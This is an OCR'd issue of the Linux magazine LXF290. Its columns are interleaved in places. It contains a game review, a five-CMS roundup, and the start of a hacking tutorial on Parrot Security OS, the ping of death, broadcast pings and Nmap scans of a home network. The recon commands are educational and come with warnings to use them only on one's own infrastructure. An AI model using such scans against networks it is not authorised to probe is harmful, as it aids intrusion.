tutorial text littered throughout the initial dungeons that you’ll unlock Challenges that make it harder, such as
you can collect, which will explain different aspects of harder bosses, champion enemies (like mini bosses), less
the gameplay. It’s a great touch because it doesn’t nutritious food and other scarce objects.
overload you with information, doesn’t rely on tedious Shattered Pixel Dungeon is rewarding and challenging,
Take a break tutorial walkthroughs, and enables you to learn as you and stands up to repeat play. Extra depth is added
from murdering go. A slight downside to this approach is occasionally through eight subclasses so you can specialise your
innocent creatures
minding their own
you can pick up a tutorial just after you needed to know abilities. This version is under constant development and
business with about the thing that has reduced your hit points to zero, the developer offers regular updates with new shops,
some horticulture. but as we’re going to be dying anyway… heroes and quests all on the cards for 2022. Shame
there’s no multiplayer options… yet.

VERDICT
DEVELOPER: Shattered Pixel
WEB: https://shatteredpixel.com
PRICE: £7.12

GAMEPLAY 8/10 LONGEVITY 9/10

GRAPHICS 9/10 VALUE 9/10

This is a classic rogue-like dungeon crawler that has a near-

decade of mobile polish applied, taking it to pixel perfection.

Rating 9/10

www.techradar.com/pro/linux July 2022 LXF290 25

WE COMPARE TONS OF STUFF SO YOU DON’T HAVE TO!

Roundup
ProcessWire 3.0.184 WordPress 5.9.3
Joomla! 4.1.2 Drupal 9.3.9 Ghost 4.43.1
Michael Reed
installed his first
CMS in the early
2000s. Well, he had
to do something
with his free
50MB of storage.…

Full-featured CMS
Michael Reed takes a good look at five heavyweight professional content
management systems that are all open source and completely free.

HOW WE TESTED…

We started with an Ubuntu LTS

(long term service) release. On
to this we installed the typical
LAMP (Linux, Apache, MySQL,
PHP) stack. We hosted this on a
virtual machine so that we could
zero everything back to the
beginning for each CMS.
Otherwise, you can easily get
tripped up by penalising the
first CMS for a difficult setup
process, whereas in fact the
subsequent CMSes needed
just as much work.
In each case, we used the
current stable release of the
CMS. Wherever we could, we
followed the official instructions
rather than trying to figure
things out for ourselves, in
order to ensure that the
instructions made sense.
Obviously, installing the ontent management systems (CMS) CMSes or ones that don’t allow manual
system is only the first stage,
and we used each of the
C is the term for software that hosts
web content, such as articles and
installation. Manual installation of a CMS
can take two forms: local installation on your
systems for a while. We put blog posts. Generally, they offer an interface own server or hosting remotely, in the cloud,
them through their paces, from which users of the site can post and usually on paid-for hosting. For our testing,
carrying out the kind of administer this content without resorting to we’ve installed each of the five CMS on to
everyday tasks that expect from hand-coding the site. Furthermore, the user our own server, but we’ll point out any issues
a CMS, such as creating new should be able to carry out customisation of relevant to remote hosting.
posts and trying our best to the look and layout of the site from within We’re trying to imagine a scenario of a
customise each site. the interface. To do all this, the CMS must typical Linux user who wants to set up their
be installed on to a web server, such as own website, make some posts and host
Apache or Nginx. some content. We’re looking for a setup that
Because we’re open source nuts here at would be ideal for a small business or an
Linux Format we’ve ignored closed source educational or open source project.

26 LXF290 July 2022 www.linuxformat.com

 Content management systems ROUNDUP

Get installed
Is the installation routine a helping
hand or more of a slap in the face?
e installed all of the CMSes locally on to an Ubuntu

W server. In some respects, this might seem unfair because

a typical hosting provider usually has a more suitable
setup environment for a typical CMS. On the other hand, it does
give us full control to troubleshoot each system, along with a level
playing field.
All of the CMSes required a bit of work to create a suitable
environment for hosting on our server. We took it as read that
we’d have to set the correct permissions for the installation
directory and that we’d have to create a MySQL database.
Most paid-for web hosting comes with a web-based tool called
phpMyAdmin, which makes this part of the process a bit easier.
Once we’d taken these steps to prepare our server environment,
WordPress installation was largely uneventful. The ProcessWire
installation process was also uneventful and offered the best
hints and checks that we saw in our tests.
Things were slightly more complicated when it came to Drupal.
On the plus side, the shortcomings of our server setup were
flagged up in a civilised manner by the installation routine, and
that meant that we could search online and within forums to
change server settings and add components in a relatively
pain-free manner.
Drupal also offered the advantage of being able to use an
SQLite database rather than MySQL. This stores the content
in a single file and means less setup work at the expense of
performance on large sites. For our tests, we went for the more
standard MySQL, but it was nice to have the option.
Here we’re completing the Drupal installation. We don’t mind requirements for PHP
components and configuration options if the installer provides helpful messages.
We tried to install Joomla! within two different versions of
Ubuntu without success. The problem was that we couldn’t
enable helpful error messages at such an early stage in the
installation. A few forum posts on the official site made reference
to similar problems with a similar server base and we never got to
the bottom of it. In the end, we hosted it with the official Docker
image, which did work. Following the official instructions, we used
Nginx instead of Apache to host Ghost. Using Nginx a little extra
work, but the instructions worked without a hitch. Ghost works a
bit differently from the others and doesn’t use an external
database but it recommends MySQL for production installations.
VERDICT
WORDPRESS 8/10 PROCESSWIRE 9/10
JOOMLA! 5/10 GHOST 8/10
DRUPAL 8/10
On balance, ProcessWire provided the smoothest installation along with
WordPress, but Joomla! was a disappointment.

Support and
community
Help for using the CMS and what
to do when we hit difficulties.
hether you’re installing the CMS, making content,

W handling problems or customising, you’ll need some

instructions from time to time. WordPress, Joolma! and
Drupal are well-established systems and this means that you can Drupal offers a fairly traditional online manual. We like having this option, along
usually find answers to problems online. WordPress has the biggest with individual articles, an active forum and general help from around the web.
advantage here due to its popularity. The official WordPress
documentation is highly comprehensive, consisting of articles felt that what is there is comprehensive and complete. The official
and a handbook. The official forum was reasonably active. forum is well-organised with a good activity level.
The Joomla! website features an active forum. Documentation Ghost’s official documentation was well organised and
was plentiful, but it was difficult to navigate for a newcomer, and it complete, and it mostly took the form of individual articles. Activity
varied in quality and age. The Drupal documentation was well levels on the forum were on the low side, though.
organised, and we quickly found the traditional, full online manual.
There were also many articles covering most aspects of using and
administering Drupal. An active forum ticked the final box of what
VERDICT
we expect in the case of software of this complexity. WORDPRESS 8/10 PROCESSWIRE 6/10
ProcessWire isn’t as well known as the other CMSes we’ve JOOMLA! 7/10 GHOST 6/10
looked at, and this means that there isn’t a huge amount of DRUPAL 9 / 10 7/10
information about it on sites other than the official site itself. This Drupal’s documentation was well organised and professional, and
site includes documentation for how to use the software, and we WordPress’s popularity gives it an advantage when troubleshooting.

www.techradar.com/pro/linux July 2022 LXF290 27

ROUNDUP Content management systems

The content editor

This is where you’ll be
working in the CMS WordPress 8/10 Ghost 9/10
Controversial on its inclusion in the 5.0 The Ghost editor is streamlined to say the
he installation process and release, WordPress now uses the so-called least. On first entering the editor, expect to

T administration of a CMS are

important, but the content
editor is where you’ll spend most of
your time, as a user. CMSes tend to deal
with two types of content: pages and
posts. In the case of the CMSes that
we’re looking at, the editors for both
types of content are unified.
What we’re looking for is a workflow
that keeps out of our way as much as
possible. That said, some users may
have more technical requirements, and
the right balance has to be struck.
Consequently, some post editors stick
to the traditional layout and look similar
to a word processor, whereas some go
for a minimalist design for quick entry
of content with a uniform layout.
As well as entering the content itself,
there should be convenient facilities to
control the attributes of the content
such as whether it’s posted according
to a schedule and where it should be
placed on the site.
Block Editor for posts and pages. In this
minimalist system, the editor is a blank
page to which the user can add content.
To add a block such as an image or a
quotation, the user creates a new
paragraph using the return key and then
clicks the plus icon that appears. A sidebar
is permanently present for posting options
such as allowing commenting. Preview for
web, tablet or mobile is accessible via a
button in the corner.
Once the dust had settled over the
change to the block editor, most users
accepted that they didn’t really need fine
control over layout within the editor or
direct access to the underlying HTML. If
you feel you do need a more traditional
editor, the classic editor can be reinstated
using a plugin. For daily posting of content,
the block editor is an efficient system.
see a plain white screen with areas to edit
the post title, an area to add a featured
image and a blank area for the body text of
the article. It’s certainly free of distractions.
Having said this, clicking a small icon
can open up a more traditional-looking
sidebar to edit post attributes. If you want
to edit the text attributes, such as creating
a section header or adding bold emphasis,
highlight the text and hover over it to reveal
a pop-up toolbar.
As soon as you start filling the post up,
the preview and post buttons appear in the
corner. The preview is particularly good
because it makes it possible for you to
see what the post will look like on a regular
website, mobile, social media preview
posting or even as an email newsletter.
Overall, this content entry system is
efficient and has a lot of features.

Themes and customisation

How easy is it to change the look and layout of your site?
he Ghost admin panel enables you to make broad be done manually. However, you can edit the currently installed

T changes to the colour scheme by choosing elements like

the highlight colour. Beyond that, it has a well-stocked
theme browser, and this combination adds up to something that’s
easy enough for end-users to dabble with.
As ever, WordPress has a great deal of choice when it comes to
themes, and they can be browsed, previewed and installed from
within the admin interface. It’s marked as beta at the moment,
but there’s a built-in GUI theme editor in which you can hover over
an element and edit it using a pop-up toolbar.
There are excellent collections of Joomla! and Drupal themes
available online, even beyond their official sites. Joomla! enables
you to have more than one theme simultaneously, associating
different themes with different content, but installation is done
manually. This involves downloading the theme and installing via
FTP or file access on the server
Drupal comes with some bundled themes that are selectable in
the admin interface, but again, installation of extra themes must
themes in terms of things like the colour scheme and banner
logo. We loved the Structure menu that makes it possible for
straightforward changes to be made to the layout of the site
elements such as sidebars and headers. WordPress’s facilities for
this task are drag and drop and potentially fiddly.
ProcessWire uses a template system that controls colour
theme and layout and can be associated with given pages. It’s
potentially a flexible system for web-coding experts, but there’s
no easily browsable collection of installable themes.
VERDICT
WORDPRESS 8/10 PROCESSWIRE 5/10
JOOMLA! 7/10 GHOST 7/10
DRUPAL 7/10
WordPress has the greatest number of themes, but Drupal and Joomla! are
quite healthy in that department, too.

28 LXF290 July 2022 www.linuxformat.com

 Content management systems ROUNDUP

Joomla! 8/10 Drupal 7/10 ProcessWire 6/10

Joomla! offers what could be called a
traditional article editor with a toolbar to
apply text attributes located at the top of
the window. A toggle enables you to switch
between a WYSIWYG view and a raw HTML
view. Another toggle extends a secondary
toolbar. This is where you add inline
images and links. It’s also where you
access the post preview which is basic,
lacking mobile or other modes.
There’s a sidebar on the right of the
screen and a tab bar along the top. The
tab bar offers a lot of options for the post
such as the posting schedules and what
elements should be visible to site visitors.
Joomla!’s editor is well-suited to
technical users, and we don’t like to knock
it for offering a lot of options. However,
there’s always a chance that less tech-
savvy contributors could hit areas of
confusion or inadvertently cause problems
due to its complexity.
Drupal has a traditional WYSIWYG content
editor with a small toolbar at the top of the
window, and this doesn’t present quite as
many features as Joomla!. A status bar
shows the HTML tags affecting the current
area of text, and a toggle enables the
writer to view and edit the underlying
HTML. A sidebar makes it possible to
edit post attributes, such as a custom
URL or a custom menu link.
The preview does look like an actual
Drupal page, but there are no extra view
modes such as mobile preview. It’s not
obvious at first, but the tab bar at the top
of the editor is integrated with the site
itself and you can quickly move between
viewing a post on the site, editing it in
the editor and back again by clicking the
tabs. It has some technical features, but
we’d say that a contributor who wasn’t
a computer expert could probably just
about manage it.
Starting a new post in ProcessWire is
slightly fiddly because you save the page
details before moving to the editor, and it’s
a standard-looking one as far as traditional
CMS editors go. A toolbar sits along the
top, but it’s less feature-packed than those
of Drupal or Joomla!. One niggle here: the
text area fills most of the window width,
making working on text content difficult.
However, this can be alleviated by resizing
the browser window.
Like Drupal, a status bar at the bottom of
the window indicates the current HTML
attributes of the text and a toggle switches
to HTML edit mode. We liked the way that
the editor included a second, fold-out
editor for the sidebar of the current page.
There’s more fiddliness when it comes to
page previews because the content isn’t
shown until you save the text as a draft,
and they’re just previews of how the post
will look on a desktop browser.

Suitability for beginners

You might be an expert, but the user of the system might not be.
e tried to picture if a non-technical user could operate they use plain-looking editors. In our experience, those new to

W each CMS well enough to be able to post content and

make some simple configuration changes.
CMS are likely to introduce inconsistencies if they’re given a
toolbar full of options. Such users just want something to type or
Sticking with the defaults, Joomla! needs an expert to make it paste into while letting the system handle the formatting.
usable for a newcomer. It lacks an admin button, preferring a URL Once actually inside the admin panels of the five systems on
for access. If you’re logged in with privileges then the modules test, the ease of use wasn’t vastly different. Ghost contained
that make up the page elements, such as the sidebar, do have edit fewer options and a permanently open sidebar in its favour,
icons on them. Obviously, there’s room to change all of this with and WordPress looked friendlier with more use of graphics
themes and admin options, but new users are left with an odd mix and more facilities for doing tasks such as installing plugins
of easily accessible changes they can make, and yet they have no without leaving the admin panel.
simple button to press to create a new post because this is
achieved in the admin panel. VERDICT
Drupal is much more accessible for the non-technical crowd in
its default state. It has a quickbar along the top for configuration WORDPRESS 9/10 PROCESSWIRE 5/10
and has an Add Content link. JOOMLA! 5/10 GHOST 9/10
Tastes vary, and we get into more detail about post editors DRUPAL 6/10
above, but we’re going to award more points to Ghost and WordPress and Ghost are the best systems for non-experts, but Drupal is a
WordPress when considering the ease of creating posts because fairly friendly system as well.

www.techradar.com/pro/linux July 2022 LXF290 29

ROUNDUP Content management systems

Extra features
Does one CMS have any niceties
that the other systems lack?
host has built-in subscription features. Posts can be

G published on your site while simultaneously being sent

as a social media post or even an email newsletter. It’s
also helpful that these end products can be previewed from within
the post editor. You can also export or import your subscriber list.
Screenshots can’t convey the speed of a CMS, but subjectively, Features aimed at creating an audience and interacting with it are common in
we noticed that Ghost seemed a bit snappier than the Ghost. It would be a lot of work to add features like these to the other CMSes.
competition. This makes sense – it’s not as reliant on plugins and
extensions because it comes pre-optimised for its intended role at When considering security issues, for once, WordPress’s
the expense of overall flexibility. popularity works against it because hacking attacks are far
WordPress has different roles that can be assigned to a user, less likely on the less-popular CMS. So, that’s a bonus point
but Drupal has more granularity and detail in this department. for the other systems. However, there are a greater number
For example, you could create a custom role with certain of professionals who can help to create customisations for
privileges or restrict a given role in areas, such as being able to WordPress than the other systems, and prices are usually lower.
edit a certain level of HTML in posts. If you’re focused on details
like these, then Drupal and Joomla! both tend to offer finer-grained VERDICT
options than WordPress.
The official Drupal website has a searchable database of WORDPRESS 9/10 PROCESSWIRE 5/10
‘distributions’. These are downloadable pre-customised versions JOOMLA! 8/10 GHOST 7/10
of Drupal that are intended for a specific role. We searched for DRUPAL 8/10
actively maintained distributions with a stable release, and there WordPress is extendable in many areas, but the other systems have some
were 125 listed. unique advantages, too.

Extensions
Beyond the defaults, to what degree
can you add features easily?
xtensions can be a lifesaver when there’s an additional

E feature that you need to offer. That said, employing

extensions isn’t always ideal because they can add
performance and maintenance overheads. If you’re having to
massively expand the CMS with extensions, it might be worth
considering a system that’s closer to your needs by default.
WordPress has a massive number of extensions available. This
means it can turn its hand to any kind of content management
role you can think of. WordPress extensions are browsed and
installed from within the admin panel, and the listings include
reviews and ratings. Extensions that exist outside the official
ecosystem can also be added to WordPress, but this has to be
done manually.
Drupal and Joomla! take a similar tack to each other when it
comes to the extension system. Both systems rely on the official
website to organise and make available extensions (which Joomla!
terms ‘modules’). In both cases some of the internal functionality
is implemented using extensions and they both ship with a
number of smaller extensions that are disabled by default.
However, we felt that Joomla! had the edge in this area in
terms of how well organised the site is and the sheer
number of commercial and free extensions.
Ghost doesn’t rely heavily on the extensions concept because
it’s already well-featured in the type of role it’s optimised for:
magazine and news type sites. However, it can be extended with
both commercial and free add ons, and there is a marketplace
area of the official site. Most of these extensions are focused on
WordPress’s extension browser is searchable and offers ratings and reviews.
It’s also fully integrated into WordPress itself making it super easy to use. The
selection of extensions is huge.
integrations with social media and the like rather than adding
new functions as such. It’s possible you could run into a brick
wall if you have a niche requirement because Ghost may not
have the extension to do it.
We were pleasantly surprised that the ProcessWire extension
ecosystem is a healthy one with a few hundred extensions, but
it’s worth remembering that WordPress, Joomla! and Drupal have
thousands of plugins. They tend to be well-documented, but there
are no reviews or ratings, and they need to be manually installed.
VERDICT
WORDPRESS 10/10 PROCESSWIRE 6/10
JOOMLA! 8/10 GHOST 5/10
DRUPAL 7/10
As ever, WordPress has the extension edge due to popularity, but Joomla!
and Drupal are also extremely healthy in this area.

30 LXF290 July 2022 www.linuxformat.com

 Content management systems ROUNDUP

The verdict
Content management systems
e’ve decided that WordPress is the overall winner of this

W month’s Roundup. As often happens when comparing

different pieces of software, popularity in itself brings
many advantages. Any problem that crops up is usually fixable
thanks to all of the advice that’s out there for WordPress.
WordPress is also the leader when it comes to extensions. Thanks
to that, we’d struggle to find any role that WordPress couldn’t be
used for when it comes to serving up content over the internet.
Whenever one of the alternatives seems to offer an advantage,
the answer is usually that WordPress has a plugin that can
achieve the same thing.
Ghost struck us as a highly streamlined environment for
magazine-style sites that mix news posts with articles. It’s
designed for the type of website that draws regular users in 1st WordPress 9/10
by using social networking integration, and unlike most CMS
systems, comes with everything ready configured for an efficient Web: www.wordpress.org Licence: GPLv2+
workflow for this type of work. In theory, you could adapt one of Version: 5.9.3
the other CMSes to make it work in much the same way, but There’s not much it can’t do when it comes to creating a website.
Ghost will suit many use-cases out of the box. The flip-side is that
you may need outside help when you come across something 2nd Drupal 8/10
that Ghost doesn’t do by default.
Drupal feels like a more business-like version of WordPress with Web: www.drupal.org Licence: GPL-2.0-or-later
a great deal of customisation scope. It’s not quite the equal of Version: 9.3.9
WordPress when it comes to ease of use, but we’d bet that the Features to keep the tech-heads happy and fairly easy to use, too.
average user could make a few small configuration changes and
post some content without having to ask for help. 3rd Ghost 7/10
It’s a shame that Joomla! hit us with a generic installation
error from the get-go, because it’s certainly a powerful and Web: https://ghost.org Licence: MIT License
extensible system. However, for day-to-day use, whether that Version: 4.43.1
be customising the system or posting content to the site, Joomla! Narrower focus than the others, but does what it does extremely well..
gives the impression that it’s aimed at technically minded people
when compared to the workflow that WordPress and Ghost offer. 4th Joomla! 7/10
ProcessWire could be used as a general-purpose CMS to self-
host a personal project site, but it’s intended to work as a Web: www.joomla.org Licence: GPL 2.0 or later
framework for developers to use as a base. It’s aimed at web Version: 4.1.2
developers who want a clean, modern base that isn’t held back Massively powerful with masses of options, but strictly one for the experts.
by legacy support. That’s not to say it’s unpleasant or difficult to
use, but if you don’t have the web development skill-set to extend 5th ProcessWire 6/10
the system yourself, then one of the other choices would
probably be the better bet. Web: https://processwire.com Licence: Mozilla Public License
2.0 Version: 3.0.184
A few rough edges, but a powerful blank slate for web developers.

ALSO CONSIDER
If you don’t want to host a CMS yourself, consider hosting – but apart from that, it’s not difficult to use.
packages that include automatic setup. In fact, https:// Typo3 (https://typo3.org) has been around for quite a while.
wordpress.com offers free WordPress hosting that includes In fact, it predates WordPress by a few years. We decided not to
automatic setup of a WordPress site that you can customise. look at it this time because it’s aimed at large organisations
Similarly there’s Ghost (Pro) https://ghost.org/pricing. rather than individual users. Textpattern (www.textpattern.
For people who like editing files, Grav (https://getgrav.org) is com) is a venerable open source CMS that concentrates on
worth considering. It doesn’t have a post editor – you add simplicity over frills. It aims to give you a substantial amount of
markdown formatted text files into the appropriate directories control over the HTML and CSS that makes up your site.

www.techradar.com/pro/linux July 2022 LXF290 31

 H
igh-profile headlines involving
the gerund ‘hacking’ are
becoming increasingly
common. Nary a day goes by
without cybercrooks making off with
millions of dollars worth of internet
money (or “priceless” NFTs). Which
is a shame because lots of the people
defending against all this computer
misuse would probably describe
themselves as hackers, too. We’ll
continue this debate within, but the
point is ransomware, denial of service
attacks and even state-sponsored
cyber operations are all on the rise.
32 LXF290 July 2022
In days gone by Linux users might have
had reason to be aloof. In the early 90s
when Linux was still young, there probably
weren’t that many people trying to attack
it. And that’s largely because there weren’t
all that many people using it. Within a
couple of years though, that had all
changed. Red Hat and openSUSE
enshrined Linux’s place in the server
market. Now it’s all over the cloud, on two
billion phones, while some quirky
individuals use it
as a desktop
operating
system.
The computing ecosystem has become
complex. So complex, in fact, that beyond
the usual guidance – “don’t click suspect
links”, “beware of email attachments” and
“keep your software up to date” – there
isn’t much tangible advice we can impart
to regular users.
So instead we look at the tricks used by
hackers on both sides of the force. And
we’ll show you a new Linux distro in the
form of Parrot Security OS. A veritable
hackers’ toolkit one might say, that will
teach you the ways of pen-testing, network
reconnaissance and exploitation. What
could possibly go wrong?
www.linuxformat.com
 Hacker’s toolkit 2022

Hack the planet/Parrot

Get started with a persistent USB install of Parrot Security OS

sually for these hacker-themed features we The hacker

U tend to make judicious use of Kali Linux, a

distro that’s jam-packed with pentesting and
OSINT (open source intelligence) tools. But it’s not
the only one – Parrot OS is equally powerful. And
we’d urge you to go and grab the Security edition
from https://parrotsec.org and write it to a USB
stick without delay. Then the games can begin.
Before exploring Parrot OS, marvel at the stylish
MATE desktop. Besides the colourful background, the
Applications menu is organised into categories ranging
with everything from privacy tools to text editors. Most
of the specialist software is in the Pentesting category,
so here you’ll find password crackers, social engineering
tools and many scanners. The System Services
category enables you to start various database and web
services, which are required for some programs. Or if
you’re targeting a locally hosted web application.
Don’t get ahead of yourself
Many of the programs in the menu are command line
affairs. If, for example, you go to Pentesting>Web
Application Analysis>wig, then a terminal will open
showing the help page for wig (the WebApp Information
Gatherer). Having read the help page, you might now
be tempted to use this to scan your (least) favourite
websites for weaknesses. But probably best not. Wig
runs as a regular user, as you can see from the stylish
ZSH prompt. But some programs are automatically
run as root, for example Recon-NG (in the … menu)
or anything that crafts packets or otherwise requires
special access. Some aren’t even programs at all. If you
click ‘webshells’ for example, Parrot just opens up a
terminal in the /usr/share/webshells directory.
knowledge website
hackthebox.com
has challenges
and labs that
use Pwnbox, a
virtual, browser-
based edition of
Parrot Security.
One reason Parrot has separate Desktop and
Security editions is that you wouldn’t necessarily want
all of those root-privileged tools lying around on your
desktop. Just having them there is a security risk. Not
because someone can exploit them, but because in the
wrong hands they can wreck one’s setup. Similarly it’s
not recommended to use the likes of Kali Linux (which
by default only uses the root account) as a daily driver.
You can, of course, install these (see, for example,
https://parrotsec.org/docs/installation.html), but
remember that Parrot Security and Kali Linux can
also be employed from a USB stick, which obviates
the need for any kind of installation. That being said,
it’s a little annoying working from a live environment
and having to remember to save your data on another
device or the cloud (since any changes you make in the
live environment are lost on shutdown). Fortunately,
Parrot makes it very easy to create a USB stick with
persistence. Since the Security edition is close to 5GB,
an 8GB USB stick will permit you 3GB of persistent
storage. This is as easy as the three-step walkthrough
(see below) suggests.

INSTALL PARROT

Get Parrot Add a partition Persistence is bliss

1 The first step is to create a regular 2 Rather than boot the USB, open it in 3 In order for Parrot to recognise the
Parrot USB. Download an ISO from Gnome Disks or Gparted. You’ll see some persistence partition, it must contain a file
https://parrotsec.org. We’d recommend free space at the end of the drive. Create named persistence.conf, which in turn
using Balena Etcher or one of the many a new Ext4 partition in this space and contains the text / union. You should
other graphical USB writing tools out there, optionally give it a label. Once that’s done be able to do this from any text editor,
but feel free to write the ISO to USB from the new partition should be visible in your depending on how filesystem permissions
the command line if you must. file manager. have been set.

www.techradar.com/pro/linux July 2022 LXF290 33

Hacker’s toolkit 2022
Hacking 101
Starting with the humble ping command and moving
on to some stealthy network recon activities…
lmost 10 years have passed since the
A infamous ‘Learn to Hack’ feature got us in
trouble with Barnes & Noble, but just in case
let’s start with a warning. The word “hacking” has
unfortunately been co-opted by the media and
entertainment industries, where it’s repeatedly used
to denote any and all illegal activities done on a
computer. The traditional (and correct!) usage refers
to much more honourable pastimes: tinkering,
reimagining and making machines behave in a way
other than how they were designed to behave.
Wait, that wasn’t a warning. This is though: whatever
you learn in this feature, be aware that inappropriate
use of computers can land you in a lot of trouble. Some
of the tools featured here can do real damage. It’s also
simple for a skilled defender to detect their use, trace
your IP address and alert the authorities. There are skills
and tricks to not getting caught and we’re not going to
teach you them. So please keep all your break-in
attempts, covert reconnaissance and Bobby’ DROP
TABLES-style SQL injections restricted to your own
infrastructure. There’s a lot to learn from poking around
your home network. Who knows, maybe you’ll discover
a misconfiguration or even a vulnerability in your router,
or a Raspberry Pi accidentally left exposed to the world.
Let’s start by using Parrot OS to do some network
reconnaissance. Specifically, we’re going to try and
identify every machine on our network.
Before we avail ourselves of Parrot’s mighty arsenal
we’re going to see how far we can get with the humble
ping command, which is available on all OSes. ‘Pinging’
In just a few
seconds EtherApe
had sniffed the
traffic from a
sizeable chunk
of Future Towers’
review network.
34 LXF290 July 2022
involves sending an ICMP packet to a host (or hosts
as we’ll see). If the host(s) haven’t been configured
to block or ignore these, then it’ll reply with an
acknowledgement packet.
It’s not helpful to block ICMP packets since they’re
useful for diagnosing network faults. However, if you
cast your mind back to 1997 (and were lucky enough to
have access to a network back then) you might recollect
a popular artefact dubbed the “Ping of Death”. The
attack worked by creating an ICMP packet that’s larger
than expected (pings are only supposed to be 64 bytes).
This is divided into chunks and then sent to the target
machine, which receives the chunks, tries to put them
back together and then promptly encounters a buffer
overflow because innocent TCP/IP stacks of the past
allocated only the memory required for a correctly sized
response packet. And then didn’t check those bounds
before trying to store it, crashing the system.
Beware the ping of death
Ping has been around since 1983, and most OSes have
their own implementation of the program. Prior to 1997,
pretty much all of them were vulnerable to the ping of
death. Windows 95’s version, for example, enabled the
user to specify a “load” parameter, which set the size of
the packet’s data field. This is supposed to be 56 bytes
(the header is an additional eight bytes), but the
command would accept arbitrary values. Setting it to
around 65,500 was generally enough to cripple a target
machine. Since this attack was widely publicised, it
didn’t take long for servers and workstations around the
www.linuxformat.com
 Hacker’s toolkit 2022

internet to be patched with appropriate malformed

packet filters and bounds checks.
Linux’s ping command still permits a size parameter,
but if you try a ping of death yourself, for example
$ ping 127.0.0.1 -c4 -s 65500
you’ll see that nary a single packet is returned, and that
your machine didn’t die. There’s no real point sanitising
the input of the ping program in this case. Remember
that it’s the kernel which does the communicating with
network hardware, and anyone could write their own
ping program to make those kernel calls with whatever
parameters they desire. This effort would deter
inexperienced script kiddies, but not veteran attackers.
The idea behind the ping of death can be generalised
to other IP packets, but the defences have been put in
place by now. That didn’t stop the IPv6 ping of death ASCII UFO invaders are coming to war drive your wireless network. Oh no, wait – it’s just the
making a brief appearance on Windows in 2013, though. Airgeddon splash screen. Stand down, people.

Capture the broadcast flag
One of the lesser-known ping features is the broadcast
flag, and that’s what we’re going to leverage to do the
network recon. As we hinted earlier, this enables not just
one machine to be pinged, but a whole subnet. Try the
following command at home, replacing the first bits of
the IP address as appropriate (255 is a ‘reserved octet’
that denotes the broadcast address, in this case
everything from 192.168.0.1 to 192.168.0.254):
as they flow through your network. And from those
packets we can collect source and destination
addresses. We’ll use the EtherApe tool to do this,
which rather pleasingly draws hosts in an ellipse as
they’re discovered in real time, as well as showing the
traffic flows between them. You’ll find EtherApe in the
Applications menu under the Pentesting>Information
Gathering section.

ANALYSE YOUR NETWORK

$ ping -b -c 4 192.168.0.255
Here we send a packet to the broadcast address and

“We send a packet to the broadcast

then wait for four response packets from each machine.
Note that the command gives you a warning that you’re

address and then wait for four

pinging a broadcast address, since users would be
mighty confused if they thought a single host was

response packets from each machine.”

replying from multiple addresses. You should see
responses from some of the computers on your
network, though many OSes (including most Linux
distros) don’t by default respond to this type of
broadcast. Identifying which machine is which is
tricky at this stage (unless you pull up your router’s
configuration page), but at least it gives us an idea of
the number of devices on your network. You’ll also see
the total roundtrip time, which can be used to diagnose
network congestion or routing issues. We’ll talk more
about weaponising pings later. For now let’s get back to
our network recon.
A more effective (and less visible) way to enumerate
the machines on your LAN is to passively ‘sniff’ packets
Having got an idea of the number of machines on
our network, we could do some deeper observation
of packets to see what they’re up to. The Wireshark
program is industry standard for this task, and easy to
get started with (click Pentesting>Most used tools).
Hackers, good and bad, use packet captures (pcaps)
obtained from the likes of Wireshark for everything from
recon to reverse engineering. Alternatively we can use
Nmap, another ubiquitous hacker tool (it even appeared
in the second Matrix film), to scan our network and find
out what those machines are up to.

INTRODUCING NMAP
Parrot comes with a handy GUI front-end
that saves you learning (at least until the
next page) Nmap’s lengthy command
line syntax. You’ll find it under Pentesting
>Information Gathering>Nmapsi4.
There’s an option to run it as root, but
don’t worry about that for now.
From the welcome screen select
Discover a network, then specify a CIDR
address and prefix length. To scan the
256 address beginning with 192.168.0,
for example, use the address 192.168.0.0
with a prefix size of 24. If you like binary Advanced menu, then you can save it in
that’s all the addresses which match the the default user’s home folder and it’ll
first 24 bits of the (32-bit) IPv4 address. still be there on reboot. Otherwise don’t
Now hit the Start button and the worry because it’s easy to regenerate
background terminal will jump into life this list later.
while the scan completes.
When it’s done save the list of
discovered IPs using the button at the
top. We’ll analyse these further over the
page. If you set up USB persistence as
described earlier, and booted using one
of the Persistence modes from the

www.techradar.com/pro/linux July 2022 LXF290 35

Hacker’s toolkit 2022
Nmap deep dive
Nmap, the stealthy port scanner, is a vital tool for any
helpful hacker or nefarious network administrator’s arsenal.
e’ve seen how the humble ping command
W can tell us not just if our machines are
reachable, but how many of them are on the
local network. If we read into the timings column a bit,
we might even speculate about how far away these
Once you’ve machines are. However, for network reconnaissance
discovered your and port scanning, you can’t beat Nmap.
network click Since we’ve already got an XML list of machines on
Scan Options to our LAN it would be nice if we could re-use it here to
commence more
thorough script
save scanning again. Sadly, the XML files generated by
scanning of Nmapsi4’s network discovery can’t be easily digested by
the machines. Nmap itself (or we couldn’t figure out a way). So let’s
NORTHERN EXPOSURE
The Common Vulnerabilities and Exposures (CVE) database is a
fantastic dataset operated by The Mitre Corporation at the behest
of the US government. It tracks vulnerabilities as they’re discovered
and cross-references them with the internal tracking systems of
companies and distros, so it’s easy to determine which versions
or which releases are vulnerable.
In addition to CVE, there’s the associated National Vulnerabilites
Database (https://nvd.nist.gov), where CVEs are rated by severity.
Several of the CVE numbers related to the ShellShock vulnerability
score a perfect 10. As do other CVEs that affect popular software, allow
remote code execution and can be carried out by fools (script kiddies).
‘Person in the middle’ attacks, which might be hard to pull off in the
real world and only lead to user impersonation or limited information
leakage, might score more modestly. Besides CVE entries, you can
also search the Common Platform Enumerations (CPE) database,
which makes it easy to find vulnerabilities in a particular product.
Sooner or later someone will release Proof of Concept (PoC) code
showing how to exploit a particular vulnerability. Ideally, this happens
after the issue is responsibly disclosed to the affected vendors or
projects, giving them time to ship patches. If not, it’s a race between
cyber fiends attacking and security teams patching.
36 LXF290 July 2022
open a terminal and do it manually. To start, just enter
the following:
$ sudo nmap 192.168.0.0/24
This will scan the local network as before, but instead
of pinging the machines it’ll probe the 1,000 most
common service ports on each machine, and tell you if
any are listening. As well as this, when we run it as root it
gives us some additional information about each host.
Namely its MAC address and the manufacturer
identification associated with that. This is our favourite
way of finding the IP addresses of Raspberry Pis on our
home networks. Since we tend to have enabled SSH on
most of these devices, we need only scan port 22 here:
$ sudo nmap -p22 192.168.0.*
As you can see, Nmap doesn’t mind if you prefer
